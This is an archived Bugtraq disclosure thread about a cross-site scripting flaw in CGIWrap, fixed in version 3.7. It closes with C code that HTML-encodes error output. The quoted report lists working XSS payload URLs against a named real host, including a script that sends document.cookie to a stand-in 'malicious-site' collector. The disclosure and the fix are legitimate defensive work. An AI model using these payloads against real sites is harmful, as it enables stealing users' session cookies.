Bugtraq mailing list archives
Re: [cgiwrap-users] Re: Security hole in CGIWrap (cross-site scripting vulnerability)
From: Nathan Neulinger <nneul () umr edu>
Date: Sun, 22 Jul 2001 12:39:03 -0500
The following cross-site scripting vulnerability was reported in cgiwrap. This has just been corrected in version 3.7, which has just been released.

http://prdownloads.sourceforge.net/cgiwrap/cgiwrap-3.7.tar.gz

All error message output is now html encoded to prevent this problem.

-- Nathan
"TAKAGI, Hiromitsu" wrote:

Hi,

I found a cross-site scripting vulnerability in CGIWrap. Cookies issued by the server on which CGIWrap is installed can be stolen. Please try to access the following URLs.

Confirming the bug:

http://www.unixtools.org/cgi-bin/cgiwrap/%3CS%3E
http://www.unixtools.org/cgi-bin/cgiwrap/<S>
http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<S>TEST</S>

JavaScript code will be executed:

http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>alert(document.domain)</SCRIPT>
http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>document.write(document.domain)</SCRIPT>
http://www.unixtools.org/cgi-bin/cgiwrap/<IMG%20SRC=javascript:alert(document.domain)>

Stealing your Cookies issued by www.unixtools.org, if any:

http://www.unixtools.org/cgi-bin/cgiwrap/~nneul/<SCRIPT>window.open("http://malicious-site/save.cgi%3F"+escape(document.cookie))</SCRIPT>
<snip>
Regards,
--
Hiromitsu Takagi, Ph.D.
National Institute of Advanced Industrial Science and Technology,
Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan
http://www.etl.go.jp/~takagi/

_______________________________________________
cgiwrap-users mailing list
cgiwrap-users () lists sourceforge net
http://lists.sourceforge.net/lists/listinfo/cgiwrap-users
--
------------------------------------------------------------
Nathan Neulinger                    EMail: nneul () umr edu
University of Missouri - Rolla      Phone: (573) 341-4841
CIS - Systems Programming           Fax: (573) 341-4216
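The bug reported above is the classic reflected-XSS shape: the requested script name (taken from the URL path) is spliced verbatim into an HTML error page, so "<SCRIPT>...</SCRIPT>" in the path is rendered as markup, and the fix in 3.7 is to HTML-encode all error-message output. The C below is an added illustration of that fix, written for this page; it is not CGIWrap's own code, and the function names html_encode, error_page_unsafe and error_page_safe, the error-page template, and the sample path "<SCRIPT>alert(1)</SCRIPT>" are all constructed for the example. It shows the unencoded error page beside the encoded one, and an encoder that refuses to write a truncated (and possibly still parseable) result when the output buffer is too small.

```c
#include <stdio.h>
#include <string.h>

/* Replace the characters that let attacker-controlled text break out of an
 * HTML text node or a quoted attribute value. Returns the number of bytes
 * written (not counting the NUL), or -1 if the output buffer cannot hold the
 * whole encoded string. Nothing is emitted on failure, so a too-small buffer
 * never yields a partially encoded payload. */
long html_encode(const char *in, char *out, size_t outlen)
{
    size_t used = 0;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char one[2] = { (char)*p, '\0' };
        const char *rep;
        switch (*p) {
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '&':  rep = "&amp;";  break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (used + n + 1 > outlen) {  /* +1 leaves room for the NUL */
            if (outlen) out[0] = '\0';
            return -1;
        }
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return (long)used;
}

/* Unsafe (the pre-3.7 behaviour described in the thread): the requested
 * script name goes straight into the HTML body, so a path that contains
 * "<SCRIPT>" is delivered to the browser as a live script tag. */
int error_page_unsafe(const char *script, char *out, size_t outlen)
{
    int n = snprintf(out, outlen,
                     "<HTML><BODY>Script %s not found.</BODY></HTML>\n", script);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

/* Hardened: the same template, but the user-controlled value is
 * HTML-encoded first, so the browser shows "<SCRIPT>" as text. */
int error_page_safe(const char *script, char *out, size_t outlen)
{
    char enc[4096];  /* encoded text can be up to 6x the input length */
    if (html_encode(script, enc, sizeof enc) < 0)
        return -1;
    int n = snprintf(out, outlen,
                     "<HTML><BODY>Script %s not found.</BODY></HTML>\n", enc);
    return (n < 0 || (size_t)n >= outlen) ? -1 : n;
}

int main(void)
{
    /* Constructed sample: what a request for /cgi-bin/cgiwrap/<SCRIPT>... would
     * hand to the wrapper once the web server has decoded the path. */
    const char *requested = "<SCRIPT>alert(1)</SCRIPT>";
    char page[512];

    if (error_page_unsafe(requested, page, sizeof page) > 0)
        fputs(page, stdout);   /* contains a raw <SCRIPT> tag */
    if (error_page_safe(requested, page, sizeof page) > 0)
        fputs(page, stdout);   /* contains &lt;SCRIPT&gt; instead */
    return 0;
}
```

The check a practitioner wants here is not that the encoder handles the one payload in the report, but that every byte reaching the page has been through it: a single error path that writes the raw value (or a buffer that silently truncates mid-entity) reopens the hole, which is why the encoder above fails closed rather than emitting a prefix.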